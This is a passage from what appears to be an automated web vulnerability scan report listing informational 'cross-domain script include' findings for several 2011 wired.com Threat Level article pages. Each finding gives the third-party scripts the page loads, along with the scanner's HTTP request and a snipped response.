Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 11:38:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=32
Expires: Wed, 12 Jan 2011 15:33:15 GMT
Date: Wed, 12 Jan 2011 15:32:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 74319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/hacking-the-hacker-stereotypes/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.72. http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/transcending-the-human-diy-style/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2010/12/transcending-the-human-diy-style/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:54 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=51
Expires: Wed, 12 Jan 2011 15:33:23 GMT
Date: Wed, 12 Jan 2011 15:32:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/transcending-the-human-diy-style/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.73. http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2010/12/wiki-style-mapping-heads-to-sea/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:48:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=39
Expires: Wed, 12 Jan 2011 15:33:24 GMT
Date: Wed, 12 Jan 2011 15:32:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 71538

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2010/12/wiki-style-mapping-heads-to-sea/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.74. http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/birgitta-jonsdottir/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/birgitta-jonsdottir/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:07:14 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=382
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 97995

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/birgitta-jonsdottir/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.75. http://www.wired.com/threatlevel/2011/01/codebreakers-death/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/codebreakers-death/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/codebreakers-death/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:44:12 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=380
Expires: Wed, 12 Jan 2011 15:33:31 GMT
Date: Wed, 12 Jan 2011 15:27:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/codebreakers-death/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.76. http://www.wired.com/threatlevel/2011/01/dubai-assassination/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/dubai-assassination/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/dubai-assassination/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 07:01:21 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=335
Expires: Wed, 12 Jan 2011 15:33:00 GMT
Date: Wed, 12 Jan 2011 15:27:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 100303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/dubai-assassination/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.77. http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/secret-tanning-camera/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/secret-tanning-camera/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:42:31 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=330
Expires: Wed, 12 Jan 2011 15:32:52 GMT
Date: Wed, 12 Jan 2011 15:27:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 80656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/secret-tanning-camera/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.78. http://www.wired.com/threatlevel/2011/01/vf-wikieaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/vf-wikieaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/vf-wikieaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:50:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=378
Expires: Wed, 12 Jan 2011 15:33:32 GMT
Date: Wed, 12 Jan 2011 15:27:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 86522

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/vf-wikieaks/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.79. http://www.wired.com/threatlevel/2011/01/video-poker/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/video-poker/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/video-poker/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 10:56:09 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=343
Expires: Wed, 12 Jan 2011 15:32:51 GMT
Date: Wed, 12 Jan 2011 15:27:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/video-poker/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.80. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/

Issue detail

The response dynamically includes the following scripts from other domains:

http://d.yimg.com/ds/badge2.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/ HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://packetstormsecurity.org/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 04:49:47 +0000
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Cache-Control: must-revalidate, max-age=389
Expires: Wed, 12 Jan 2011 13:06:05 GMT
Date: Wed, 12 Jan 2011 12:59:36 GMT
Connection: close
Content-Length: 90454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</a>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<li id="sb_yahoo">
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="logo">wired:http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/</script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/2011/01/wikileaks-sunken-treasure/&hl=en&client=ca-pub-9817987453265044&adU=Verizon.com&adT=Verizon+Internet+-+%2419.99&adU=www.Brocade.com&adT=Ethernet+Fabrics&adU=www.Comcast.com&adT=Comcast%C2%AE+High+Speed&adU=www.google.com/nexus&adT=The+New+Google+Nexus+S&gl=US/x26usg/x3dAFQjCNGTF4DW2TDGEnchvTvU-Xc_zM5wgQ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:30 +0000
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:27:06 GMT
Date: Wed, 12 Jan 2011 15:27:06 GMT
Content-Length: 56148
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

6.82. http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/&t=WikiLeaks%20Cables%20Cited%20in%20Lawsuit%20Over%20$500%20Million%20Sunken%20Treasure previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
